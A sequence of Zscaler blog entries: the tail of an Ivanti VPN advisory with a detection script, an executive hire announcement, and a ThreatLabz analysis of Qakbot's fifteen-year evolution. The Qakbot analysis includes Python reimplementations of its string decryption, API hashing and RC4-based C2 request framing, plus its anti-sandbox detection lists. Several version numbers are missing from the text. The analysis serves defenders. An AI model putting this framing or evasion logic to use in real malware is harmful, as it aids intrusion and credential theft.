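            in_window = [e for e in events[i:] if e["ts"] - first["ts"] <= window]
            hosts = {e["dst"] for e in in_window}
            if len(hosts) >= min_hosts:
                findings.append({
                    "user": user,
                    "src": first["src"],
                    "start": first["ts"].isoformat(),
                    "hosts": sorted(hosts),
                    "protocols": sorted({e["proto"] for e in in_window}),
                })
                break                             # one finding per account is enough
    return findings


if __name__ == "__main__":
    for f in find_fanout(SAMPLE_LOG):
        print(f"{f['user']} from {f['src']} reached {len(f['hosts'])} hosts "
              f"({', '.join(f['protocols'])}) starting {f['start']}: {', '.join(f['hosts'])}")
```

On the constructed log only svc-backup is reported: six hosts over SMB, SSH and RDP in under four minutes from a VPN pool address, which is the pattern the advisory describes. asmith (two hosts, 45 minutes apart) and jchen (not sourced from the pool) stay quiet. Tune the window and host threshold against a baseline from before December 3, 2023, and feed any hit straight into the privileged-account audit and credential rotation the recommendations above call for.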
How Zscaler Can Help

Zscaler's cloud native zero trust network access (ZTNA) solution gives users fast, secure access to private apps from any location. It reduces your attack surface and the risk of lateral threat movement: no more internet-exposed remote access IP addresses, and connections are brokered inside-out. It is easy to deploy, and it enforces consistent security policies across campus and remote users.

Zscaler Private Access™ (ZPA) lets organizations secure private app access from anywhere. Connect users to apps, never the network, with AI-powered user-to-app segmentation. Prevent lateral threat movement with inside-out connections. Deploy comprehensive cyberthreat and data protection for private apps with integrated application protection, deception, and data protection.

Figure 2: VPN vulnerabilities open doors to cyber threats; protect against these risks with a zero trust architecture.

Zero trust is a fundamentally different architecture from those built on firewalls and VPNs. It delivers security as a service from the cloud and at the edge, instead of requiring you to backhaul traffic to complex stacks of appliances (hardware or virtual). It provides secure any-to-any connectivity in a one-to-one fashion, for example connecting a user directly to an application. It does not put any entity on the network as a whole, and it adheres to the principle of least-privileged access. In other words, with zero trust, security and connectivity are decoupled from the network, which sidesteps the challenges of perimeter-based approaches described above. A zero trust architecture:

- Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
- Stops compromise by using the power of the cloud to inspect all traffic, including encrypted traffic at scale, to enforce policies and stop threats in real time.
- Prevents lateral threat movement by connecting entities to individual IT resources instead of extending access to the network as a whole.
- Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, at rest, and in use.

Additionally, a zero trust architecture overcomes many other problems associated with firewalls, VPNs, and perimeter-based architectures by improving user experience, reducing operational complexity, saving your organization money, and more.

Zscaler ThreatLabz recommends that customers implement the following capabilities to safeguard against these types of attacks:

- Safeguard crown jewel applications by limiting lateral movement, using Zscaler Private Access to establish user-to-app segmentation policies based on the principle of least privilege, including for employees and third-party contractors.
- Limit the impact of a potential compromise by restricting lateral movement with identity-based microsegmentation.
- Prevent exploitation of private applications by compromised users with full inline inspection of private app traffic in Zscaler Private Access.
- Use Advanced Cloud Sandbox to prevent unknown malware delivered in second-stage payloads.
- Detect and contain attackers attempting to move laterally or escalate privileges by luring them with decoy servers, applications, directories, and user accounts with Zscaler Deception.
- Identify and stop malicious activity from compromised systems by routing all server traffic through Zscaler Internet Access.
- Restrict traffic from critical infrastructure to an allow list of known-good destinations.
- Ensure that you are inspecting all SSL/TLS traffic, even when it comes from trusted sources.
- Turn on Advanced Threat Protection to block all known command-and-control domains.
- Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall, including emerging C&C destinations.
Best Practices

Follow CISA directives: Timely compliance with CISA's Emergency Directive on the Ivanti vulnerabilities is critical to minimizing their impact.

Implement a zero trust architecture: Enterprises must rethink traditional approaches to security, replacing vulnerable appliances such as VPNs and firewalls. Implementing a true zero trust architecture, fortified by AI/ML models, to block and isolate malicious traffic and threats is a critical foundational step. Prioritize user-to-application segmentation, where users are never placed on the same network as your applications. This is an effective way to prevent lateral movement and keep attackers from reaching crown jewel applications.

Proactive Measures to Safeguard Your Environment

In light of the recent vulnerabilities affecting Ivanti, employ the following best practices to fortify your organization against exploitation:

- Minimize the attack surface: Make apps (and vulnerable VPNs) invisible to the internet so that an attacker cannot gain initial access.
- Prevent initial compromise: Inspect all traffic inline to automatically stop zero-day exploits, malware, and other sophisticated threats.
- Enforce least-privileged access: Restrict permissions for users, traffic, systems, and applications using identity and context, so that only authorized users can reach named resources.
- Block unauthorized access: Use strong multi-factor authentication (MFA) to validate user access requests.
- Eliminate lateral movement: Connect users directly to apps, not the network, to limit the blast radius of a potential incident.
- Shut down compromised users and insider threats: Enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
- Stop data loss: Inspect data in motion and data at rest to stop active data theft during an attack.
Deploy active defenses: Leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
Cultivate a security culture: Many breaches begin with the compromise of a single user account via a phishing attack. Prioritizing regular cybersecurity awareness training can help reduce this risk and protect your employees from compromise.
Test your security posture: Get regular third-party risk assessments and conduct purple team exercises to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team.
Conclusion
Ivanti's VPN products face severe security threats due to multiple zero-day vulnerabilities exploited by state-backed hackers. The initial disclosure revealed critical CVEs allowing unauthorized access and remote command injection. Following Ivanti's patch release, two additional flaws enabling privilege escalation were swiftly exploited by the threat actors. CISA responded with an advisory and an emergency directive setting deadlines for mitigating the original issues. With the discovery of new vulnerabilities and the absence of patches, CISA issued a supplemental directive mandating that Federal agencies disconnect Ivanti ICS and IPS solutions from their networks by 11:59pm EST, February 2, 2024.
Fri, 02 Feb 2024 14:11:41 -0800 Deepen Desai

Zscaler Appoints Steve McMahon as New Chief Customer Success Officer
In the past year, Zscaler achieved a significant milestone by surpassing $2B in ARR. We take great pride in the fact that we accelerated from $1B to $2B ARR within a span of just seven quarters. Looking ahead, our sights are set on surpassing $5B ARR, a testament to our continuous growth and the trust placed in us by over 40% of Fortune 500 companies for their secure digital transformation.
As we embark on this journey, we are diligently ensuring that our organizational structure and leadership are well-equipped to propel us to the next level of success. While Zscaler has many impressive stats about its business, the stat I’m most proud of is the Net Promoter Score (NPS) of over 70 while the average NPS score for SaaS companies is 30. This is driven by our innovative architecture and customer obsession which are part of our key values. The organization that plays a critical role in making sure our customers are delighted is Customer Success. To scale the customer success organization and continue exceeding expectations of our global customers, I’m excited to welcome Steve McMahon to Zscaler as our new Chief Customer Success Officer. This strategic addition to our leadership lineup demonstrates our ongoing commitment to delivering exceptional customer experiences and driving long-term growth. With over 25 years of customer success and services experience at a range of leading technology companies including Cisco, Splunk and, most recently, CrowdStrike, Steve has the expertise and know-how for developing strategies and programs that drive customer satisfaction, retention, and advocacy. His extensive experience in this space will enable us to further optimize our customer engagement model, ensuring that we are providing the right level of support at every stage of the customer journey. The trusted relationship we establish and cultivate with our customers is paramount to our business, which is why customer obsession has always been at the heart of everything we do. I am confident that Steve’s contributions will have a positive impact on our organization and help us maintain our focus on driving customer loyalty and satisfaction. Please join me in extending a warm welcome to Steve and a big thank you to the Zscaler team for your continued support and commitment to making Zscaler the leader in cloud security. 
Wed, 31 Jan 2024 11:01:44 -0800 Jay Chaudhry

Tracking 15 Years of Qakbot Development
Introduction
Qakbot (aka QBot or Pinkslipbot) is a malware trojan that has been used to operate one of the oldest and longest running cybercriminal enterprises. Qakbot has evolved from a banking trojan to a malware implant that can be used for lateral movement and the eventual deployment of ransomware. In August 2023, the Qakbot infrastructure was dismantled by law enforcement. However, just several months later in December 2023, the fifth (and latest) version of Qakbot was released, marking more than 15 years of development. In this blog, we will analyze Qakbot from the first version dating back to 2008 through the most recent version that continues to be updated as of January 2024. Our analysis demonstrates the threat actor behind Qakbot is resilient, persistent, and innovative.
Key Takeaways
Qakbot originated in 2008 as a banking trojan designed to steal credentials and conduct ACH, wire, and credit card fraud. In recent years, Qakbot has become an initial access broker delivering Cobalt Strike for lateral movement and ultimately resulting in second-stage infections including ransomware like BlackBasta. Over the years, Qakbot's anti-analysis techniques have improved to evade malware sandboxes, antivirus software, and other security products. The malware is modular and can download plugins that enable it to dynamically add new functionality. The threat group behind Qakbot has now released five distinct versions of the malware with the latest release in December 2023.
A Brief History of Qakbot
ThreatLabz researchers have been tracking Qakbot for more than a decade and our analysis started with samples that date back to 2008. These early versions of Qakbot contained a date timestamp rather than a version number. However, we will refer to these samples as version 1.0.0 for clarity and consistency with subsequent versions.
At that time, Qakbot leveraged a dropper with two embedded components in the resource section that consisted of a malicious DLL and a tool to inject the DLL into running processes. The Qakbot DLL implemented a wide variety of features including: a SOCKS5 server, stealing passwords, harvesting web browser cookies, and spreading via SMB. These early versions were heavily developed and even had a feature to report crash dumps. In 2011, Qakbot introduced a versioning system that started with 2.0.0 that has signified major developmental milestones over time. The Qakbot major version number is a three-digit hexadecimal value with 0x500 (or 5.0.0) being the most recent. Qakbot was largely used for banking fraud until 2019, when the threat actor pivoted to serving as an initial access broker for ransomware including Conti, ProLock, Egregor, REvil, MegaCortex, and BlackBasta. The following timeline illustrates the key developments for each version of Qakbot. Each version of Qakbot represents a snapshot in time and is indicative of the threat landscape during that period. For instance, early versions contained hardcoded command-and-control (C2) servers. As time progressed, law enforcement and malware researchers worked successfully with domain registrars to suspend malicious domains. In response, the Qakbot threat actor added network encryption and implemented a solution to remove the C2 server’s single point of failure by adding a domain generation algorithm (DGA). While a DGA addressed the single point of failure issue, it also created significant noise when querying for a large number of domains. As a result, the Qakbot developer devised a new multi-tiered architecture that leveraged compromised systems to act as proxy servers that relay network traffic between other infected systems and the backend C2 infrastructure. This design update addressed the single point of failure problem, reduced network traffic, and effectively hid the subsequent C2 tiers. 
In the following sections, we will analyze key areas where Qakbot has evolved significantly including anti-analysis techniques, network communication, and the implementation of a modular design.
Anti-Analysis Techniques
Qakbot has implemented anti-analysis techniques from the beginning of its development including string obfuscation, API obfuscation, and malware sandbox evasion.
String obfuscation
Every version of Qakbot since its inception has obfuscated the malware's important strings with a simple XOR algorithm. The XOR key (and most recently, the derivation of an XOR key) is used to decrypt strings. Moreover, the reference structure to the strings has also evolved across versions. In the first two versions (1.0 and 2.0), the malware decrypted a block of strings from the data section, overwriting the original encrypted block, and the unencrypted strings remained in memory as shown in Figure 1. This simple design was likely an attempt to evade static antivirus signatures.
Figure 1. Early versions of Qakbot string obfuscation
In later versions of Qakbot, the XOR key length was significantly increased, and strings were decrypted and copied to a newly allocated buffer. Qakbot version 5.0 made perhaps the most significant change to the string encryption algorithm. The strings are still encrypted with a simple XOR key. However, the XOR key is no longer hardcoded in the data section. Instead the XOR key is encrypted with AES, where the AES key is derived by performing a SHA256 hash of a buffer. A second buffer contains the AES initialization vector (IV) as the first 16 bytes, followed by the AES-encrypted XOR key. Once the XOR key has been decrypted, the block of encrypted strings can then be decrypted as shown in Figure 2.
Figure 2. Qakbot 5.0 string decryption
API obfuscation
In versions 1 and 2, Qakbot carried a list of Windows API names used by the malware in the encrypted strings table.
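The two mechanisms of this section, the XOR string table described above and the CRC32-based import resolution that the API obfuscation paragraphs go on to describe, in one added example. This is illustrative code written for this page, not code from the ThreatLabz post or from Qakbot itself. The key, the four strings, the XOR constant 0x218FE95B and the export list are all constructed for the demo (real keys are far longer and the real constant differs per build). It also goes slightly beyond the text: dump_strings walks an entire block the way a string decryptor for a new sample would, and resolve_hashes is the analyst-side table rebuild used to annotate a disassembly, not something the malware does.

```python
"""Qakbot-style XOR string table decryption and CRC32 API hash resolution.

Added example, not code from the ThreatLabz post or from Qakbot.
Every constant below is constructed for the demo.
"""
import zlib

# --- Constructed sample data (not recovered from a real sample) --------------
DEMO_KEY = b"ThreatLabz-demo-key"          # a real 3.x/4.x key is much longer
DEMO_STRINGS = [b"kernel32.dll", b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc"]
DEMO_XOR_CONST = 0x218FE95B                # stands in for the hardcoded constant


def xor_block(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the primitive every Qakbot version has used.
    XOR is symmetric, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def build_string_block(strings, key):
    """Lay the strings out NUL-terminated, back to back, and encrypt them.
    Returns (encrypted_block, offsets) so the caller knows where each starts."""
    plain = bytearray()
    offsets = []
    for s in strings:
        offsets.append(len(plain))
        plain += s + b"\x00"
    return xor_block(bytes(plain), key), offsets


def string_at(enc_block: bytes, key: bytes, offset: int) -> str:
    """Decrypt only the NUL-terminated string at `offset` into a fresh buffer.

    Mirrors the 3.x/4.x behaviour described in the post: the encrypted block
    is left untouched. Note the key index follows the absolute offset into
    the block, not the start of the string."""
    out = bytearray()
    for i in range(offset, len(enc_block)):
        c = enc_block[i] ^ key[i % len(key)]
        if c == 0:
            break
        out.append(c)
    return out.decode("latin-1")


def dump_strings(enc_block: bytes, key: bytes) -> dict:
    """Walk the whole block and return {offset: string}."""
    result = {}
    pos = 0
    while pos < len(enc_block):
        s = string_at(enc_block, key, pos)
        result[pos] = s
        pos += len(s) + 1          # skip the terminating NUL
    return result


def api_hash(name: str, xor_const: int = 0) -> int:
    """CRC32 of the API name XORed with a hardcoded constant.
    xor_const=0 reproduces the earlier plain-CRC32 variant."""
    return (zlib.crc32(name.encode("ascii")) ^ xor_const) & 0xFFFFFFFF


def resolve_hashes(wanted, exports, xor_const: int = 0) -> dict:
    """Analyst-side resolver: hash every export of the candidate DLL and map
    each wanted hash back to a name (None when nothing matches)."""
    table = {api_hash(n, xor_const): n for n in exports}
    return {h: table.get(h) for h in wanted}


if __name__ == "__main__":
    enc, offs = build_string_block(DEMO_STRINGS, DEMO_KEY)
    print(dump_strings(enc, DEMO_KEY))
    exports = ["CreateFileW", "LoadLibraryA", "GetProcAddress", "VirtualAlloc"]
    wanted = [api_hash("VirtualAlloc", DEMO_XOR_CONST), 0xDEADBEEF]
    print(resolve_hashes(wanted, exports, DEMO_XOR_CONST))
```

In practice the export list comes from parsing the export directory of the DLL the sample resolves against, and the XOR constant is read out of the hashing routine shown in Figure 3; once both are known, the same table rebuild labels every hashed import in the binary.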
After the strings table was decrypted, the code would dynamically resolve the address of each API at runtime and then initialize a table of pointers that could then be used by Qakbot to invoke the corresponding function when required. This implementation made it harder for malware researchers and antivirus software to statically determine the APIs used at runtime. In more modern versions, the Qakbot developer further obfuscated the use of APIs by resolving the imports using a CRC32 hash rather than a string. At first, Qakbot used the CRC hashes of the API name directly, and subsequent versions performed an XOR with a hardcoded value and the CRC hash. Figure 3 shows an example of this dynamic API import hashing algorithm.
Figure 3. Example Qakbot API obfuscation
Junk code
Over time, Qakbot has introduced blocks of code that are deliberately non-functional to defeat static antivirus signatures as shown in Figure 4. In the example below, a block of junk code was added prior to an RC4 initialization routine.
Figure 4. Example of Qakbot junk code block in an RC4 initialization function
Anti-sandbox techniques
Qakbot has implemented numerous detection mechanisms to identify researcher environments and malware sandboxes since the earliest versions. In particular, Qakbot has attempted to identify processes, system artifacts, and the underlying virtual machines associated with an analysis environment. Figure 5 shows an example of Qakbot's implementation to identify whether an infected system is running on a VMware virtual machine from a sample dating back to September 2009.
Figure 5. Qakbot implementation to identify VMware
Qakbot has continuously added code to identify analysis environments by checking system information such as the name of BIOS vendors, processes, drivers, etc. for strings as shown in Table 1.
vmxnet, vmx_svga, vmrawdsk, vmdebug, vm3dmp, vSockets, srootkit, sbtisht, ansfltr, Xen, XENVIF, XENSRC, XENCLASS, XENBUS, Vmscsi, VirtualBox, Virtual Machine, Virtual HD, VirtIO, VRTUAL, VMware server memory, VMware SVGA, VMware SCSI, VMware Replay, VMware Pointing, VMware Accelerated, VMware, VMW, VMAUDIO, VIRTUAL-DISK, VBoxVideo, QEMU, PROD_VIRTUAL_DISK, MS_VM_CERT, CWSandbox, 20202020
Table 1. Qakbot virtual machine string-based detections
The following processes in Table 2 are frequently used by malware analysts and are also detected by Qakbot:
frida-winjector-helper-32.exe, packetcapture.exe, filemon.exe, proc_analyzer.exe, sniff_hit.exe, frida-winjector-helper-64.exe, capturenet.exe, procmon.exe, sysAnalyzer.exe, sysAnalyzer.exe, tcpdump.exe, qak_proxy, idaq64.exe, sniff_hit.exe, BehaviorDumper.exe, windump.exe, dumpcap.exe, loaddll32.exe, joeboxcontrol.exe, processdumperx64.exe, ethereal.exe, CFF Explorer.exe, PETools.exe, joeboxserver.exe, anti-virus.EXE, wireshark.exe, not_rundll32.exe, ImportREC.exe, ResourceHacker.exe, sysinfoX64.exe, ettercap.exe, ProcessHacker.exe, LordPE.exe, x64dbg.exe, sctoolswrapper.exe, rtsniff.exe, tcpview.exe, SysInspector.exe, Fiddler.exe, sysinfoX64.exe, FakeExplorer.exe, apimonitor-x86.exe, idaq.exe, dumper64.exe, user_imitator.exe
Table 2. Malware analyst process names detected by Qakbot
Around version 404.510, the malware developer added extraneous exports to the Qakbot stager DLL to confuse malware sandboxes, as shown in Figure 6. In this example, the export name Wind (or ordinal #458) is the actual entry point.
Figure 6. Qakbot 404.510 sample with 458 entries in the exports directory
Network Communication
Qakbot has leveraged HTTP for C2 communication from the beginning. However, the network protocol on top of HTTP has changed significantly over the years with encryption, RSA signature verification, and the addition of a JSON-based message format.
Network protocol and encryption
Qakbot has continuously updated its message protocol, with version 19 being the latest.
The protocol specifies the format of the message. In version 3, Qakbot sent requests in a format similar to the following:
protoversion=9&r=1&n=kvtjmq970452&os=
This format was later replaced with a JSON-based protocol in which integer keys denote specific fields, as shown below:
{
  "8": 1,
  "5": 1035,
  "1": 19,   // protocol version
  "59": 0,
  "3": "obama259",
  "4": 1028,
  "10": 1683022694,
  "2": "kqsvfc505763",
  "6": 59661,
  "14": "Xgd1KxZQKTHGB6IxwtIy2e0RAq4iFNE6w6",
  "7": 16759,
  "101": 1,
  "26": "WORKGROUP",
  "73": 0
}
This encoding adds a layer of obfuscation for each of the message fields.
Qakbot's network encryption has used RC4, with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA1. The most recent version of Qakbot now uses AES encryption, with the key consisting of 16 random bytes concatenated with a hardcoded salt and hashed using SHA256. After encryption, the data is Base64 encoded and sent as the value of a variable in the body of an HTTP POST request.
Domain generation algorithm
The first versions of Qakbot only used hardcoded C2s as shown in Figure 7.
Figure 7. Example of hardcoded Qakbot C2s
However, in version 2.0.1 a DGA was added as a backup C2 channel in the event that the hardcoded C2s were unreachable. Qakbot used a time-based DGA to generate up to 5,000 C2 domains for a specific date interval as shown in Figure 8.
Figure 8. Qakbot DGA code
Interestingly, some versions of Qakbot would generate fake domains if an analysis environment was detected in an effort to mislead researchers, as shown in Figure 9.
Figure 9. Example of Qakbot generating fake domains if network monitoring tools were detected
Data exfiltration to compromised FTP servers
Qakbot versions 3.0.0 and earlier used compromised FTP servers to exfiltrate data rather than sending the data directly to their C2 server.
The FTP credentials were stored in Qakbot's configuration files as shown below:
22=<ip address 1>:[email protected]:<credspassword1>:
23=<ip address 2>:[email protected]:<credspassword2>:
24=<ip address 3>:[email protected]:<credspassword3>:
25=<ip address 4>:[email protected]:<credspassword4>:
26=
3=1581496845
This design had an inherent weakness since anyone with the FTP credentials could potentially have accessed and recovered the stolen information. To address this weakness, Qakbot was later updated to send the stolen data directly to Qakbot's C2 infrastructure.
Using compromised systems as relays
After version, Qakbot ceased using the DGA. Instead, Qakbot started using compromised systems themselves as C2 servers, and embedded a list of IP addresses and port numbers in the malware configuration. Before version, the configuration file (stored as an encrypted resource) contained the list of IP addresses in a text-based format:
;0;443;0;443;0;443;0;995;0;995;0;995;0;2222;0;443;0;443 …
However, after version, the Qakbot C2 list evolved into a binary format as shown in Figure 10.
Figure 10. Qakbot C2 list binary format
Commands
In the first versions of Qakbot, the server sent commands in a descriptive text-based format. The following commands were supported in Qakbot versions 1.0 and 2.0:
certssave, ckkill, cksave, clearvars, cron, cronload, cronsave, forceexec, ftpwork, getip, install3, instwd, kill, killall, loadconf, nbscan, psdump, reload, rm, saveconf, sleep, socks, sxordec, sxorenc, sysinfo, thkill, thkillall, uninstall, update, update_finish, uploaddata, var, wget
In order to obfuscate these commands, the Qakbot author replaced these string commands with integer values starting in the later builds of version 3.
Addition of RSA signature verification
Qakbot version introduced RSA digital signatures (initially using the MatrixSSL library) to prevent tampering.
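Returning to the message framing described above under network protocol and encryption (a JSON object with integer-named fields, RC4 under a key of SHA1(16 random bytes || salt), Base64 in a POST variable), here is an added example that builds such a request and decodes a captured one. This is illustrative code written for this page, not the post's or Qakbot's own code. Assumptions: the salt value and the POST variable name `data` are made up; the 16 random bytes are assumed to be sent in front of the ciphertext so the receiver can rederive the key (the post does not say how they are conveyed); the sample field values are copied from the JSON quoted in the post but, apart from field "1" (protocol version), their meanings are not interpreted. The SHA256 derivation used by the current AES-based version is offered as an option in derive_key, but the AES path itself is not implemented here.

```python
"""Qakbot-style C2 request framing: JSON -> RC4 -> Base64 -> POST body.

Added example, not code from the post or from Qakbot. The salt, the POST
variable name and the placement of the 16 random bytes are assumptions.
"""
import base64
import hashlib
import json
import os
from urllib.parse import parse_qs, urlencode

DEMO_SALT = b"demo-salt-not-qakbots"      # constructed, not a real Qakbot salt
POST_VAR = "data"                         # assumed POST variable name

# Constructed request modelled on the JSON quoted in the post.
SAMPLE_FIELDS = {"8": 1, "5": 1035, "1": 19, "59": 0, "3": "obama259",
                 "4": 1028, "10": 1683022694, "2": "kqsvfc505763", "6": 59661,
                 "14": "Xgd1KxZQKTHGB6IxwtIy2e0RAq4iFNE6w6", "7": 16759,
                 "101": 1, "26": "WORKGROUP", "73": 0}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                                  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                                        # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def derive_key(rand16: bytes, salt: bytes = DEMO_SALT, algo: str = "sha1") -> bytes:
    """Per-message key = H(random16 || salt). The post describes SHA1 for the
    RC4 era and SHA256 for the current AES-based version; only the RC4 path is
    exercised in this example."""
    if len(rand16) != 16:
        raise ValueError("expected exactly 16 random bytes")
    return hashlib.new(algo, rand16 + salt).digest()


def build_request(fields: dict, rand16: bytes = b"") -> str:
    """Client side: serialise, encrypt, Base64 and place in a POST variable.
    A fixed rand16 may be passed to make the output reproducible."""
    rand16 = rand16 or os.urandom(16)
    plaintext = json.dumps(fields, separators=(",", ":")).encode()
    blob = rand16 + rc4(derive_key(rand16), plaintext)    # random bytes sent in clear (assumption)
    return urlencode({POST_VAR: base64.b64encode(blob).decode()})


def parse_request(body: str, salt: bytes = DEMO_SALT) -> dict:
    """Server/analyst side: recover the JSON from a captured POST body.
    Raises ValueError when the body is too short or does not decrypt to JSON
    (wrong salt, truncated capture, or not this protocol at all)."""
    blob = base64.b64decode(parse_qs(body)[POST_VAR][0])
    if len(blob) < 17:
        raise ValueError("body too short to hold random bytes plus payload")
    rand16, ciphertext = blob[:16], blob[16:]
    plaintext = rc4(derive_key(rand16, salt), ciphertext)
    try:
        return json.loads(plaintext)
    except ValueError as exc:                             # covers JSON and UTF-8 errors
        raise ValueError("decryption did not yield JSON; wrong salt?") from exc


if __name__ == "__main__":
    body = build_request(SAMPLE_FIELDS)
    print(body[:60] + "...")
    fields = parse_request(body)
    print("protocol version:", fields["1"])
```

Because the per-message key depends only on the 16 clear-text random bytes and a salt that is constant per build, recovering the salt from one sample is enough to decrypt every capture from that build; that is the property a network decoder for this family relies on.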
This was especially important when the DGA and compromised systems were used as C2 servers.
Modular Structure
The design of Qakbot has changed significantly from versions 1 through 5. In particular, the malware has become more modular with the ability to dynamically add new features without releasing a new version of Qakbot. Modern versions use a lightweight stager responsible for initializing, maintaining persistence, and establishing C2 communication to request commands and modules.
Embedded resources
Prior to version, Qakbot frequently used the resource section to store configuration information (such as web injects and application parameters) as well as DLLs that performed malicious behavior. Initially, in version 1.0, these resources were not encrypted. However, Qakbot's code evolved with various encryption algorithms to protect these resources.
Qakbot version 2.0 implemented a custom XOR-based algorithm as shown in Figure 11.
Figure 11. Custom encryption algorithm used by Qakbot 2.0 to protect resources
In this example, the offset 0x7 in the encrypted resource contained a WORD that was the size of the XOR key. The XOR key was located at offset 0x9 in the resource. Encrypted data was then concatenated after the XOR key. Python code that replicates this algorithm is shown below:

import struct

def custom_xor(data, key):
    # XOR each byte with the repeating key, then rotate the result right by (i & 7) bits
    out = b""
    for i, eb in enumerate(data):
        v6 = eb ^ key[i % len(key)]
        v1 = (v6 & (0xff & (255 >> (8 - (i & 7))))) << (8 - (i & 7))  # low (i & 7) bits moved to the top
        v2 = v6 >> (i & 7)                                            # remaining bits shifted down
        v3 = v1 | v2
        out += struct.pack("B", v3)
    return out

s = open('res.bin', 'rb').read()
key_sz = struct.unpack('<H', s[7:9])[0]          # little-endian WORD at offset 0x7: length of the XOR key
s = custom_xor(s[9 + key_sz:], s[9:9 + key_sz])  # key starts at offset 0x9, encrypted data follows it
print(s)

Qakbot version 3.0 and later used an RC4-based algorithm to decrypt the resources. The initial 0x14 bytes in the resource served as the RC4 key for decrypting the remaining data.
A slightly modified version of the BriefLZ library was later added to compress specific resources to reduce the overall file size.
In version, the resource encryption algorithm changed slightly. The first 0x14 bytes of the resource were no longer used as an RC4 key. Instead, the code contained a salt value in the encrypted strings table that was then hashed using SHA1 to derive the RC4 key used to decrypt the resource. In version this was improved again, with two layers of RC4 used to decrypt the resource. The first RC4 layer was decrypted using the SHA1 hash of the salt string. The second layer used the first 0x14 bytes of the result as the key to decrypt the following data. Example Python code for this algorithm is shown below (RC4 via pycryptodome's ARC4):

import hashlib
from Crypto.Cipher import ARC4  # pycryptodome

seed = b"Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd"               # salt string taken from the encrypted strings table
key = hashlib.sha1(seed).digest()
resource_data = open('res.bin', 'rb').read()
dec_data = ARC4.new(key).decrypt(resource_data)[0x14:]      # first RC4 layer; leading 0x14 bytes skipped as in the original snippet
data = ARC4.new(dec_data[0:0x14]).decrypt(dec_data[0x14:])[0x14:]  # second layer keyed by the first 0x14 bytes of what remains

Plugins
In version 4.0.1, Qakbot was modified to split various functionality into separate modules. This allowed Qakbot to use a stager to download additional modules from Qakbot's C2 servers to add functionality on demand. Qakbot has built modules to hook web browsers, steal email addresses (and email), harvest stored credentials, deploy Cobalt Strike, and act as a C2 server that relays traffic between other infected systems and the backend infrastructure.
Conclusion
Qakbot is a sophisticated trojan that has evolved significantly over the past 15 years, and remains remarkably persistent and resilient. Despite the significant disruption to Qakbot in August 2023, the threat group remains active and recently updated their codebase to support 64-bit versions of Windows, improved the encryption algorithms, and added more obfuscation. This demonstrates that Qakbot will likely remain a threat for the foreseeable future and ThreatLabz will continue to add detections to protect customers.
Zscaler Cloud Sandbox
Zscaler's multilayered cloud security platform detects payloads with the following threat names: Win32.Banker.Qakbot
Indicators Of Compromise (IOCs)
Date | Version | Sample Hash (MD5)
2008-08-28 | 1.0.0 | 34588857312371e4b789fb49d2606386
2009-11-16 | 1.0.0 | 8c33780752e14b73840fb5cff9d31ba1
2009-12-29 | 1.0.0 | 37bbdaf1d14efa438f9ff34d8eeaa5e7
2010-10-12 | | d02252d88c3eab14488e6b404d2534eb
2011-05-12 | | b9e23bc3e496a159856fd60e397452a0
2012-05-31 | | 570547fa75c15e6eb9e651f2a2ee0749
2013-07-08 | | 42e724dc232c4055273abb1730d89f28
2014-06-24 | | 9160ea12dbce912153b15db421bb87da
2015-01-28 | | 945ba16316c8a6a8428f0b50db0381dc
2015-12-17 | | dca0ef26493b9ac3172adf931f1a3499
2016-01-04 | | 6718c6af4b89cffd9b6e0c235cf85bd2
2016-01-04 | | 8fbb43dc853d0b95829112931493fe22
2016-01-13 | | 72125013ac58d05adb32b7406b02c296
2016-01-29 | | 3b4a2e984a51210d0594c9b555ba4e0d
2016-02-09 | | f952dc1e942ebdfb95a2347263265438
2016-02-12 | | b849381ab6a4e97d32580bb52d15cb7d
2016-03-08 | | dc8b137d5d61b23dbbb6085ce46bfcdb
2016-04-05 | | 327a5e491d6db899d9db4c6bdc8f5367
2016-04-05 | | e3b0e54777ca9fd9863e3563a1b7dd59
2016-04-06 | | 2e9261e75e15540ef88327a480a5b10e
2016-04-26 | | a472b9dd64198d739c6e415bbcae8a6f
2016-05-19 | | 8609e6e4d01d9ef755832b326450cbe9
2016-06-01 | | a7cc19cde3a1a78b506410e4ffafdbef
2017-04-27 | | 581016035f95327e7e1daac3ad55ae0e
2017-05-16 | | 361d46f32a93786b34b2ac225efc0f79
2018-02-06 | | 89e6f171c29255d6b4490774c630ad14
2019-09-16 | | ff186a1ef9e83c229940ff2dd4556eaf
2020-01-22 | | bea66da7088bd20adbfed57cf350a6a4
2020-01-22 | | 1cd7a95064515625ad90464a65ea4d94
2020-03-03 | | 08c51514a42eec6ccbbc7a09a8258419
2020-03-20 | | d8ff9d18cd622c545d21b199a2d17594
2020-04-01 | | 2e658f5fa658651331cb5b16447bdbe2
2020-04-29 | | ca22283396dbe21fa2ef5e27c85ffae6
2020-05-07 | | e9d0e767a5c5284ab33a3bb80687cf63
2020-05-07 | | d8841201c9d32b5e885f4d035e32f654
2020-05-28 | | 82d7c5ea49c97059bbec02161b36f468
2020-08-07 | | 163ee88405bccc383c7b69c39028bf9a
2020-08-07 | | acf65632b7cdc40091daec58bf8830bc
2020-08-11 | | 455c543243f5216e21ba045814311971
2020-08-11 | | cfc77e4421d830e73c6f6040a4baedd4
2020-11-03 | | 40a9bdac882285ab844917d8b5b75188
2020-11-24 | | 6b1771b883c0b3ffdc3f5923f45c1f93
2020-12-15 | | 0a3caa2845251b8fb5ab72f450edd488
